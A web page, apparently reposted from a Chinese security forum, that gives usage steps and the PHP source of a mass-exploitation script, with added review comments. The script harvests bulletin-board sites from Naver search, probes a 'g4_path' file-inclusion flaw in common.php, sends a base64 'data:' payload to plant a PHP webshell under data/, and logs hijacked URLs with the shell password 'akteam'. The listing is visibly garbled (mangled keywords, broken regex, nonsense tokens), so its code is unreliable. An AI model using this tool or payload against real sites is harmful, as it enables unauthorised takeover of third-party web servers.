From Hongke Network Security
1. Build a PHP environment on the local machine
2. Save the EXP Program
3. Run the command in CMD to execute php PTR. php.
4. Successful URLs are recorded in akt.txt.
5. http: // target URL/data/hardison. php password: akteam connected with PHP
EXP:
Copy the Code <? Php
// Driver: print a banner, then page through a public Naver web-search result
// listing for the query "bbs/board.php" (start = 11, 21, ..., 991; 10 hits per
// page) and hand each page to get().  The scanner has no target list of its
// own — it harvests one from a search engine ("dorking"), which is why the
// victim never sees the search traffic, only the follow-up probes from fuck().
// NOTE(review): as reproduced on this page the listing is machine-mangled
// (capitalised keywords, stray spaces in identifiers and URLs) and is not
// runnable in this form; the comments below annotate it as-is.
Echo "+ ---------------------------------------------------------------- + ";
Echo "http://bbs.honkwin.com ";
Echo "+ ---------------------------------------------------------------- + ";
For ($ ii = 1; $ ii <= 99; $ ii ++)
{
// $c is the 1-based offset of the first result on page $ii (11, 21, ... 991).
$ C = (int) $ ii * 10 + 1;
$ A = "web.search.naver.com ";
// Search query is fixed: pages that expose a "bbs/board.php" path.
$ B = "/search. naver? Where = webkr & query = bbs/board. php & xc = & docid = 0 & lang = all & st = s & fd = 2 & start = ". $ c. "& display = 10
& Qvt = 0 & sm = tab_pge ";
Get ($ a, $ B );
}
// get($host, $file): fetch one search-result page over a raw TCP socket and
// forward the first matching board URL to fuck().
//   $host  - search-engine host name (port 80, 10 s connect timeout)
//   $file  - request path incl. query string
// Returns false on socket failure, otherwise nothing (falls off the end).
// The request is hand-assembled with a fixed Firefox 2.0.0.5 User-Agent and a
// hard-coded cookie; both are constant across every run and so make a usable
// log signature, but only on the search-engine side — the board host under
// test never receives this request.
Function get ($ host, $ file)
{
$ Fp = fsockopen ($ host, 80, $ errno, $ errstr, 10 );
If (! $ Fp ){
Echo "SocketError: $ errstr ($ errno )";
Return false;
}
// NOTE(review): no header line terminators survive in this copy of the
// listing, so the request as written here is not a well-formed HTTP message.
$ Get = "GET $ file HTTP/1.1 ";
$ Get. = "Host: $ host ";
$ Get. = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv: 1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 ";
$ Get. = "Referer: http: // $ host ";
$ Get. = "Connection: Close ";
$ Get. = "Cookie: ns_acl_nautocomplete = 1; NB = Beijing; NNB = AIUHYPM7OXJUS; page_uid = fOL9uloi5UNssbPX/M8sss -- 100532; _ naver_usersession _ = Beijing ";
Fwrite ($ fp, $ get );
// Whole response body is read before parsing (blocks until the peer closes).
$ Response = stream_get_contents ($ fp );
// Extract absolute URLs ending in "bbs/board.php" from the result HTML;
// $put[0] holds the full matches.
Preg_match_all ("(http: // [-w.] + (: d + )? (/([W/_.] *)? Bbs/board. php) ", $ response, $ put );
For ($ I = 0; $ I <count ($ put [0]); $ I ++)
{
$ A = (int) $ I * 3;
// Only the first match of each page is probed: the unconditional Break below
// ends the loop on its first iteration, so $a is always 0 here.
Fuck ($ put [0] [$ a]);
// Echo count ($ put [0]);
// Print_r ($ put [0]);
// Fuck ($ put [0] [$ I]);
Break;
}
Fclose ($ fp );
}
// fuck($OK): probe one board installation for a file-inclusion flaw in
// common.php and, if present, try to plant and verify a PHP file under data/.
//   $OK - absolute URL ending in "bbs/board.php", as matched by get()
// Prints one of "Vulnerability yes/no" per host; on a confirmed shell the URL
// is appended to akt.txt.  Nothing is returned.
// The board software is identified only by its "g4_path" request parameter;
// all three requests below carry that parameter in the query string, which is
// the thing to look for in access logs: "common.php?g4_path=" followed by a
// "data:" wrapper or a "/tmp" path from an external client.  A hardened
// install never takes an include path from the request, runs PHP with
// allow_url_include=Off (so the data: wrapper is refused by include()), and
// does not execute PHP from the data/ directory — which also blocks the
// akteam.php / hardison.php files this script expects to find there.
Function fuck ($ OK)
{
// Base URL of the install: the matched URL with "bbs/board.php" removed.
// (preg_replace's arguments are garbled in this copy of the listing.)
$ A = preg_replace (bbs/board. php), $ OK );
// Probe 1: force an include of a non-existent path to see whether the
// parameter reaches include() unvalidated (expects a PHP warning echoing the
// path back).
$ File = $ a. "common. php? G4_path =/tmp2345 ";
// Probe 2: same parameter fed a "data:" stream wrapper whose base64 body is
// PHP source; per the page header it writes data/hardison.php on the host.
$ Xxx = $ a. "common. php? G4_path = data:; base64, PD9mcHV0cyhmb3BlbignLi9kYXRhL2hhcmRpc29uLnBocCcsJ3crJyksJzw/
Alias/Pg = ";
// Probe 3: URL checked afterwards to confirm the dropped file is served.
$ Shell = $ a. "data/akteam. php ";
$ Target = parse_url ($ OK );
$ Sitepath = $ target [host];
$ Xx = @ file_get_contents ($ file );
// "Warning" plus "tmp" in the response = the include error leaked the
// attacker-supplied path, i.e. g4_path is used verbatim.
If (eregi ("(Warning)", $ xx) & eregi ("(tmp)", $ xx ))
{
Print $ sitepath. "Vulnerability yes "."";
// Fire the data:-wrapper request; its output is discarded.
@ File_get_contents ($ xxx );
$ Oksehll = @ file_get_contents ($ shell );
If (! Eregi ("/\ 02345)", $ xx ))
{
Print $ sitepath. "OK "."";
}
// Success criterion: the planted page serves content containing "akteam".
If (eregi ("(akteam)", $ oksehll ))
{
Print $ shell. "pass: akteam "."";
$ Axx = "". $ shell;
// NOTE(review): this line is garbled in the listing; presumably an append
// open of akt.txt whose handle is $sh — the file the header calls the
// results log.
Mongoshadefopen(akt.txt, "a + ");
Fwrite ($ sh, $ axx );
Fclose ($ sh );
}
}
Else
{
Print $ sitepath. "Vulnerability no "."";
}
}
?>